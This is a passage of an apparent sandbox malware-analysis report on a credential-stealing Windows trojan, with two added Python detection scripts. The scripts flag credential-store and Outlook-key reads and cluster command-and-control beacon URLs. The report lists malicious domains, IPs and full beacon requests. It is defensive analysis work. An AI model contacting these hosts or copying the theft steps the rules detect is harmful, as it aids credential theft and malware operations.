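# Chromium files holding saved logins, cookies, autofill data and the DPAPI-wrapped key.
CRED_STORE_FILES = {"login data", "cookies", "web data", "local state"}
# Registry path (lower-cased, hive dropped) that the report shows Atuserer.exe opening.
OUTLOOK_PROFILE_KEY = r"software\microsoft\windows nt\currentversion\windows messaging subsystem\profiles"


@dataclass
class Alert:
    rule: str
    process: str
    detail: str


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _cmdline_image(cmdline: str) -> str:
    """Lower-cased file name of the executable a Windows command line names (quoted or not)."""
    try:
        first = shlex.split(cmdline, posix=False)[0]
    except (ValueError, IndexError):
        return ""
    return _basename(first.strip('"'))


def check_process_create(ev: dict) -> list[Alert]:
    alerts = []
    image, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])
    # Genuine service hosts are children of services.exe.
    if image == "svchost.exe" and parent != "services.exe":
        alerts.append(Alert("svchost-not-from-services", ev["Image"], f"parent {ev['ParentImage']}"))
    # The report shows svchost.exe created with "C:\Users\user\Desktop\RO2Y11yOJ7.exe" as its
    # command line: the image and the executable named on the command line disagree.
    launched = _cmdline_image(ev["CommandLine"])
    if launched and launched != image:
        alerts.append(Alert("cmdline-image-mismatch", ev["Image"], f"command line names {launched}"))
    return alerts


def check_object_access(ev: dict) -> list[Alert]:
    alerts = []
    image, obj = _basename(ev["Image"]), ev["ObjectName"].lower()
    if "\\user data\\" in obj and _basename(obj) in CRED_STORE_FILES and image not in BROWSER_OWNERS:
        alerts.append(Alert("browser-credstore-read", ev["Image"], ev["ObjectName"]))
    if OUTLOOK_PROFILE_KEY in obj and image != "outlook.exe":
        alerts.append(Alert("outlook-profile-read", ev["Image"], ev["ObjectName"]))
    return alerts


def run_rules(events: list[dict]) -> list[Alert]:
    """Apply every rule to every event, preserving event order."""
    alerts: list[Alert] = []
    for ev in events:
        if ev["EventType"] == "ProcessCreate":
            alerts.extend(check_process_create(ev))
        elif ev["EventType"] == "ObjectAccess":
            alerts.extend(check_object_access(ev))
    return alerts


# Constructed events. Events 1, 2, 4, 5 and 7 mirror rows of this report;
# events 3 and 6 are benign baselines the rules must leave alone.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "CommandLine": r'"C:\Users\user\Desktop\RO2Y11yOJ7.exe"',
     "ParentImage": r"C:\Users\user\Desktop\RO2Y11yOJ7.exe"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\SysWOW64\Atuserer.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\Atuserer.exe"',
     "ParentImage": r"C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"EventType": "ObjectAccess", "Image": r"C:\Windows\SysWOW64\Atuserer.exe",
     "ObjectName": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"EventType": "ObjectAccess", "Image": r"C:\Windows\SysWOW64\Atuserer.exe",
     "ObjectName": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"},
    {"EventType": "ObjectAccess", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ObjectName": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"EventType": "ObjectAccess", "Image": r"C:\Windows\SysWOW64\Atuserer.exe",
     "ObjectName": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"},
]

if __name__ == "__main__":
    for a in run_rules(SAMPLE_EVENTS):
        print(f"{a.rule:28} {a.process}  ({a.detail})")
```

On the sample events the rules raise five alerts: two for the svchost.exe launch (wrong parent, command line naming another executable) and three for the credential-store and Outlook key reads by Atuserer.exe. The services.exe-spawned svchost.exe and chrome.exe's own read of Login Data raise none. The command-line check relies on `shlex.split(..., posix=False)` so that backslashes and quotes in Windows paths are kept verbatim.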

                Remote Access Functionality

Source: Yara match | File source: 4.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.4c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3153276903.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1675780203.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1675422438.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3163418586.0000000000E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3166059888.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1676172842.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3158152521.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3163670686.00000000023F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003B6399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003B685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_00377C21 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset
MITRE ATT&CK matrix, listed per tactic. Digits preceding a technique name are the count badges shown on that cell of the matrix, reproduced as exported.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior graph (ID 1551211; sample RO2Y11yOJ7.exe; start date 07/11/2024; architecture WINDOWS; score 100). A number in parentheses after a process name is the badge carried by that node in the graph export; the legend above lists what the badges denote. Edge labels are those of the graph: "started" for a child process, "injected" for a process the parent injected into.

Sample-level network nodes: www.7153115.xyz; www.tingba.sbs; 10 other IPs or domains. Sample-level signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures. On www.7153115.xyz: Performs DNS queries to domains with low reputation.

Process tree:
RO2Y11yOJ7.exe (2), started
    signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
    svchost.exe, started
        signatures: Maps a DLL or memory area into another process
        avRLXQyosx.exe, injected
            signatures: Found direct / indirect Syscall (likely to bypass EDR)
            Atuserer.exe (13), started
                signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                avRLXQyosx.exe, injected
                    signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    network: www.jllllbx.top 156.234.28.94, ports 50002, 50003, 50004 (XIAOZHIYUN1-AS-APICIDCNETWORKUS, Seychelles); www.5hdgb2p9a.buzz 168.76.221.252, ports 49982, 49983, 49984 (ULTRANETSERVICOSEMINTERNETLTDABR, South Africa); 7 other IPs or domains
                firefox.exe, started

Antivirus detection, initial sample (Source | Detection | Scanner | Label):
RO2Y11yOJ7.exe | 68% | ReversingLabs | Win32.Trojan.AutoitInject
RO2Y11yOJ7.exe | 100% | Joe Sandbox ML |
Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches

Antivirus detection, URLs (Source | Detection | Scanner | Label):
http://www.lnnn.fun/u5w9/ | 0% | Avira URL Cloud | safe
http://www.onamae.com/?banner_id=634 | 0% | Avira URL Cloud | safe
http://www.7153115.xyz/dblf/ | 100% | Avira URL Cloud | malware
http://www.budged.net/zslv/ | 0% | Avira URL Cloud | safe
http://www.jllllbx.top/14ny/?eL-x=RcS/7b6AyQg4ZUqZZRdiR4QAk8bBBIP44+AM+xEUzuW33DbFu14QWxhHRozVg07q+e31G6ugIhvO9kCRCtuNtETua9CX3TPbBNSnRMkK6/CxEYN7+Q==&wFVH=-zwTKPF0iPth | 0% | Avira URL Cloud | safe
http://www.lexjetcenter.net/ugdo/?eL-x=kxJ3od325Xqo8wxQ1hBgR6SDm2DyJ3wteCEI/DiGOvMuHKXdFQvV7KpJf8xNWNcGdoq0hBwRfp4PtcpQcJYcqVm6hUSlzi3DLiLBqaXQmTBihn830w==&wFVH=-zwTKPF0iPth | 0% | Avira URL Cloud | safe
http://www.5hdgb2p9a.buzz/nl7t/ | 0% | Avira URL Cloud | safe
http://www.gmo.jp/images/public/common/logo.gif | 0% | Avira URL Cloud | safe
http://www.jllllbx.top/14ny/ | 0% | Avira URL Cloud | safe
http://www.j252mv.site/bjtw/?eL-x=csNti9Ni0CMSF+Luu5Lb4YGLWTncdI4NtLZHzGNdKQ96nntWCfQjnA+gcdSxDY8YzUt2/7rDdvxAnlLOvCpJP4lTvOHTPP+iYlkpfhDtlBKj7b5q5w==&wFVH=-zwTKPF0iPth | 0% | Avira URL Cloud | safe
http://www.onamae-server.com/ | 0% | Avira URL Cloud | safe
http://www.j252mv.site/bjtw/ | 0% | Avira URL Cloud | safe
http://www.elarac.top/favd/?wFVH=-zwTKPF0iPth&eL-x=WtgtBzW4FsxMnQSuWOIYSeEoiXDfOi+mEu8byEiY5V0Es9uEUQhozXoYk37/fSn7c76G5+FTj9P/4AI0dbo7dAuFWhjyFRNqxijvASv2x9K31F87tg== | 0% | Avira URL Cloud | safe
http://www.lnnn.fun/u5w9/?eL-x=A3LutOpKcAePelibJkXDDYFDO+A/U7kX8Qw8AI5F82KOCrYaBuw+x7BD9zmk5lVUkEcfBKV2GIclDvoU+V9Cq0mSlb4StpI39XWYwC+owI+4erZmyw==&wFVH=-zwTKPF0iPth | 0% | Avira URL Cloud | safe
http://www.elarac.top/favd/ | 0% | Avira URL Cloud | safe
http://www.tingba.sbs/njro/?wFVH=-zwTKPF0iPth&eL-x=4m2dXuyzH1K67YjRiF0xgcinYZd6F04lkWHhJhjAgk74IEPWOAVZvwb6DAALc1Sd7YFs2hEz0292kCRHtftOb0bCUTNRw6g5HYfyDosdAoVL7yu4Ug== | 0% | Avira URL Cloud | safe
http://www.jllllbx.top | 0% | Avira URL Cloud | safe
http://www.tingba.sbs/njro/ | 0% | Avira URL Cloud | safe
http://www.7153115.xyz/dblf/?eL-x=xA4m52UOO3AWG6dLOPkkJ91gfa/sOtMUS9WQ9/7Ili2Upd70ADnAJWaIHnvs9U+whG/nDh7qG8iCbCHdOukQeWX5e+ZPWvcCIT2YOJAlrSuLiE5N6g==&wFVH=-zwTKPF0iPth | 100% | Avira URL Cloud | malware
http://www.budged.net/zslv/?eL-x=EUn3g8LYsBqqsV8ZNTlu3xKd6tkG7Tp6GSwv0X2RMky81SP9KPrWQ2UszFzoalUNSIFimuT2bUDct3BiYGyyefEtviAnix38iMVeAihtAydc/vF2ig==&wFVH=-zwTKPF0iPth | 0% | Avira URL Cloud | safe
https://00808.vip/ | 100% | Avira URL Cloud | malware
Domains (Name | IP | Active | Malicious | Reputation; the Antivirus Detection column is empty for every row):
www.lnnn.fun | 188.114.96.3 | true | true | unknown
www.7153115.xyz | 103.249.106.91 | true | true | unknown
www.jllllbx.top | 156.234.28.94 | true | true | unknown
lexjetcenter.net | 3.33.130.190 | true | true | unknown
www.elarac.top | 192.64.118.221 | true | true | unknown
budged.net | 195.154.200.15 | true | true | unknown
www.5hdgb2p9a.buzz | 168.76.221.252 | true | true | unknown
www.j252mv.site | 150.95.254.16 | true | true | unknown
www.tingba.sbs | 172.67.202.10 | true | true | unknown
www.mt2rahu.tech | unknown | unknown | false | unknown
www.budged.net | unknown | unknown | false | unknown
www.lexjetcenter.net | unknown | unknown | false | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://www.lnnn.fun/u5w9/ | true | Avira URL Cloud: safe | unknown
http://www.7153115.xyz/dblf/ | true | Avira URL Cloud: malware | unknown
http://www.lexjetcenter.net/ugdo/?eL-x=kxJ3od325Xqo8wxQ1hBgR6SDm2DyJ3wteCEI/DiGOvMuHKXdFQvV7KpJf8xNWNcGdoq0hBwRfp4PtcpQcJYcqVm6hUSlzi3DLiLBqaXQmTBihn830w==&wFVH=-zwTKPF0iPth | true | Avira URL Cloud: safe | unknown
http://www.budged.net/zslv/ | true | Avira URL Cloud: safe | unknown
http://www.j252mv.site/bjtw/?eL-x=csNti9Ni0CMSF+Luu5Lb4YGLWTncdI4NtLZHzGNdKQ96nntWCfQjnA+gcdSxDY8YzUt2/7rDdvxAnlLOvCpJP4lTvOHTPP+iYlkpfhDtlBKj7b5q5w==&wFVH=-zwTKPF0iPth | true | Avira URL Cloud: safe | unknown
http://www.5hdgb2p9a.buzz/nl7t/ | true | Avira URL Cloud: safe | unknown
http://www.jllllbx.top/14ny/?eL-x=RcS/7b6AyQg4ZUqZZRdiR4QAk8bBBIP44+AM+xEUzuW33DbFu14QWxhHRozVg07q+e31G6ugIhvO9kCRCtuNtETua9CX3TPbBNSnRMkK6/CxEYN7+Q==&wFVH=-zwTKPF0iPth | true | Avira URL Cloud: safe | unknown
http://www.jllllbx.top/14ny/ | true | Avira URL Cloud: safe | unknown
http://www.j252mv.site/bjtw/ | true | Avira URL Cloud: safe | unknown
http://www.elarac.top/favd/?wFVH=-zwTKPF0iPth&eL-x=WtgtBzW4FsxMnQSuWOIYSeEoiXDfOi+mEu8byEiY5V0Es9uEUQhozXoYk37/fSn7c76G5+FTj9P/4AI0dbo7dAuFWhjyFRNqxijvASv2x9K31F87tg== | true | Avira URL Cloud: safe | unknown
http://www.tingba.sbs/njro/?wFVH=-zwTKPF0iPth&eL-x=4m2dXuyzH1K67YjRiF0xgcinYZd6F04lkWHhJhjAgk74IEPWOAVZvwb6DAALc1Sd7YFs2hEz0292kCRHtftOb0bCUTNRw6g5HYfyDosdAoVL7yu4Ug== | true | Avira URL Cloud: safe | unknown
http://www.lnnn.fun/u5w9/?eL-x=A3LutOpKcAePelibJkXDDYFDO+A/U7kX8Qw8AI5F82KOCrYaBuw+x7BD9zmk5lVUkEcfBKV2GIclDvoU+V9Cq0mSlb4StpI39XWYwC+owI+4erZmyw==&wFVH=-zwTKPF0iPth | true | Avira URL Cloud: safe | unknown
http://www.elarac.top/favd/ | true | Avira URL Cloud: safe | unknown
http://www.7153115.xyz/dblf/?eL-x=xA4m52UOO3AWG6dLOPkkJ91gfa/sOtMUS9WQ9/7Ili2Upd70ADnAJWaIHnvs9U+whG/nDh7qG8iCbCHdOukQeWX5e+ZPWvcCIT2YOJAlrSuLiE5N6g==&wFVH=-zwTKPF0iPth | true | Avira URL Cloud: malware | unknown
http://www.tingba.sbs/njro/ | true | Avira URL Cloud: safe | unknown
http://www.budged.net/zslv/?eL-x=EUn3g8LYsBqqsV8ZNTlu3xKd6tkG7Tp6GSwv0X2RMky81SP9KPrWQ2UszFzoalUNSIFimuT2bUDct3BiYGyyefEtviAnix38iMVeAihtAydc/vF2ig==&wFVH=-zwTKPF0iPth | true | Avira URL Cloud: safe | unknown
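The contacted-URL table shows one request shape repeated on eight otherwise unrelated hosts: a plain-http URL with a single four-character directory (/14ny/, /ugdo/, /bjtw/, ...), one parameter whose value is a long base64-looking blob that differs per request, and a second parameter whose value is the same short token, -zwTKPF0iPth, on every host. The following script, an added example that is not part of the Joe Sandbox report, clusters proxy-log requests on that shape so that a beacon pool surfaces as one group spanning many hosts rather than as unrelated single requests. The log-line layout is a constructed assumption; the request URLs in the sample log are taken verbatim from this report, and the benign control lines use URLs that also appear in the report.

```python
"""Added example: cluster proxy-log requests that share the beacon URL shape seen in
this report's URL table. Not Joe Sandbox code. The log-line layout is an assumption;
the URLs in SAMPLE_LOG are the report's own."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Assumed proxy-log layout: "<timestamp> <client-ip> <method> <url>".
LOG_LINE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+)$")
# Beacon path: a single four-character lower-case alphanumeric directory (e.g. /14ny/).
SHORT_DIR = re.compile(r"^/[a-z0-9]{4}/$")
# Standard-alphabet base64 of at least 64 characters, optionally padded.
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")
SHORT_TOKEN_MAX = 16


def split_query(query: str) -> list[tuple[str, str]]:
    """Split a query string on '&' and '=' without decoding '+' or '%xx',
    so the blob is compared exactly as it was sent (parse_qsl would turn '+' into ' ')."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def beacon_shape(url: str):
    """Return (host, sorted parameter names, short token) when the URL has the beacon
    shape: plain http, four-character directory, exactly two parameters, one long
    base64 blob and one short token. Return None for anything else."""
    u = urlsplit(url)
    if u.scheme != "http" or not SHORT_DIR.match(u.path):
        return None
    pairs = split_query(u.query)
    if len(pairs) != 2:
        return None
    blobs = [v for _, v in pairs if B64_BLOB.match(v)]
    tokens = [v for _, v in pairs if 1 <= len(v) <= SHORT_TOKEN_MAX]
    if len(blobs) != 1 or len(tokens) != 1:
        return None
    return u.hostname, tuple(sorted(k for k, _ in pairs)), tokens[0]


def cluster_beacons(log_lines, min_hosts: int = 3) -> dict:
    """Group beacon-shaped requests by (parameter names, short token) and keep the
    groups that span at least min_hosts distinct hosts. The blob changes per request;
    the parameter names and the short token are what stay constant across the pool."""
    hosts_by_key = defaultdict(set)
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        shape = beacon_shape(m["url"])
        if shape:
            host, names, token = shape
            hosts_by_key[(names, token)].add(host)
    return {k: sorted(h) for k, h in hosts_by_key.items() if len(h) >= min_hosts}


# Constructed log lines wrapping URLs from this report; the last three are benign controls.
SAMPLE_LOG = [
    "2024-11-07T14:50:01Z 10.0.0.5 GET http://www.jllllbx.top/14ny/?eL-x=RcS/7b6AyQg4ZUqZZRdiR4QAk8bBBIP44+AM+xEUzuW33DbFu14QWxhHRozVg07q+e31G6ugIhvO9kCRCtuNtETua9CX3TPbBNSnRMkK6/CxEYN7+Q==&wFVH=-zwTKPF0iPth",
    "2024-11-07T14:50:02Z 10.0.0.5 GET http://www.lexjetcenter.net/ugdo/?eL-x=kxJ3od325Xqo8wxQ1hBgR6SDm2DyJ3wteCEI/DiGOvMuHKXdFQvV7KpJf8xNWNcGdoq0hBwRfp4PtcpQcJYcqVm6hUSlzi3DLiLBqaXQmTBihn830w==&wFVH=-zwTKPF0iPth",
    "2024-11-07T14:50:03Z 10.0.0.5 GET http://www.j252mv.site/bjtw/?eL-x=csNti9Ni0CMSF+Luu5Lb4YGLWTncdI4NtLZHzGNdKQ96nntWCfQjnA+gcdSxDY8YzUt2/7rDdvxAnlLOvCpJP4lTvOHTPP+iYlkpfhDtlBKj7b5q5w==&wFVH=-zwTKPF0iPth",
    "2024-11-07T14:50:04Z 10.0.0.5 GET http://www.elarac.top/favd/?wFVH=-zwTKPF0iPth&eL-x=WtgtBzW4FsxMnQSuWOIYSeEoiXDfOi+mEu8byEiY5V0Es9uEUQhozXoYk37/fSn7c76G5+FTj9P/4AI0dbo7dAuFWhjyFRNqxijvASv2x9K31F87tg==",
    "2024-11-07T14:50:05Z 10.0.0.5 GET http://www.lnnn.fun/u5w9/?eL-x=A3LutOpKcAePelibJkXDDYFDO+A/U7kX8Qw8AI5F82KOCrYaBuw+x7BD9zmk5lVUkEcfBKV2GIclDvoU+V9Cq0mSlb4StpI39XWYwC+owI+4erZmyw==&wFVH=-zwTKPF0iPth",
    "2024-11-07T14:50:06Z 10.0.0.5 GET http://www.tingba.sbs/njro/?wFVH=-zwTKPF0iPth&eL-x=4m2dXuyzH1K67YjRiF0xgcinYZd6F04lkWHhJhjAgk74IEPWOAVZvwb6DAALc1Sd7YFs2hEz0292kCRHtftOb0bCUTNRw6g5HYfyDosdAoVL7yu4Ug==",
    "2024-11-07T14:50:07Z 10.0.0.5 GET http://www.7153115.xyz/dblf/?eL-x=xA4m52UOO3AWG6dLOPkkJ91gfa/sOtMUS9WQ9/7Ili2Upd70ADnAJWaIHnvs9U+whG/nDh7qG8iCbCHdOukQeWX5e+ZPWvcCIT2YOJAlrSuLiE5N6g==&wFVH=-zwTKPF0iPth",
    "2024-11-07T14:50:08Z 10.0.0.5 GET http://www.budged.net/zslv/?eL-x=EUn3g8LYsBqqsV8ZNTlu3xKd6tkG7Tp6GSwv0X2RMky81SP9KPrWQ2UszFzoalUNSIFimuT2bUDct3BiYGyyefEtviAnix38iMVeAihtAydc/vF2ig==&wFVH=-zwTKPF0iPth",
    "2024-11-07T14:50:09Z 10.0.0.5 GET http://www.5hdgb2p9a.buzz/nl7t/",
    "2024-11-07T14:50:10Z 10.0.0.5 GET http://www.gmo.jp/images/public/common/logo.gif",
    "2024-11-07T14:50:11Z 10.0.0.5 GET https://duckduckgo.com/ac/?q=",
]

if __name__ == "__main__":
    for (names, token), hosts in cluster_beacons(SAMPLE_LOG).items():
        print(f"params={names} token={token} hosts={len(hosts)}: {', '.join(hosts)}")
```

On the sample log the only cluster is parameter names (eL-x, wFVH) with token -zwTKPF0iPth, spanning all eight hosts; the bare /nl7t/ request has no parameters, the logo.gif request has no four-character directory and the https request fails the scheme check, so none of them join a group. Because the grouping key deliberately ignores the host, the same key will keep matching when the operator rotates to domains this report never saw, as long as the parameter names and the short token stay the same.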
URLs found in memory or binary data (Name | Source | Malicious | Antivirus Detection | Reputation):
https://duckduckgo.com/chrome_newtab | Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.onamae.com/?banner_id=634 | Atuserer.exe, 00000007.00000002.3165412212.0000000005A6E000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000002.3164252655.0000000003BCE000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.gmo.jp/images/public/common/logo.gif | Atuserer.exe, 00000007.00000002.3165412212.0000000005A6E000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000002.3164252655.0000000003BCE000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.onamae-server.com/ | Atuserer.exe, 00000007.00000002.3165412212.0000000005A6E000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000002.3164252655.0000000003BCE000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.jllllbx.top | avRLXQyosx.exe, 00000008.00000002.3166059888.00000000054DB000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://00808.vip/ | Atuserer.exe, 00000007.00000002.3165412212.00000000060B6000.00000004.10000000.00040000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3167412341.0000000007780000.00000004.00000800.00020000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000002.3164252655.0000000004216000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
192.64.118.221 | www.elarac.top | United States | 22612 | NAMECHEAP-NETUS | true
168.76.221.252 | www.5hdgb2p9a.buzz | South Africa | 265240 | ULTRANETSERVICOSEMINTERNETLTDABR | true
188.114.96.3 | www.lnnn.fun | European Union | 13335 | CLOUDFLARENETUS | true
150.95.254.16 | www.j252mv.site | Japan | 7506 | INTERQGMOInternetIncJP | true
103.249.106.91 | www.7153115.xyz | China | 137443 | ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK | true
172.67.202.10 | www.tingba.sbs | United States | 13335 | CLOUDFLARENETUS | true
3.33.130.190 | lexjetcenter.net | United States | 8987 | AMAZONEXPANSIONGB | true
195.154.200.15 | budged.net | France | 12876 | OnlineSASFR | true
156.234.28.94 | www.jllllbx.top | Seychelles | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS | true
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1551211
                                                        Start date and time:2024-11-07 15:48:29 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 41s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Run name:Run with higher sleep bypass
Number of new started processes analysed:12
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:2
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:RO2Y11yOJ7.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:12e60b3db1e0cb33c5e66d0c114b8fa1033984e21f3741e97111f41b37a04978.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@7/3@11/9
                                                        EGA Information:
                                                        • Successful, ratio: 75%
                                                        HCA Information:
                                                        • Successful, ratio: 92%
                                                        • Number of executed functions: 45
                                                        • Number of non-executed functions: 281
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
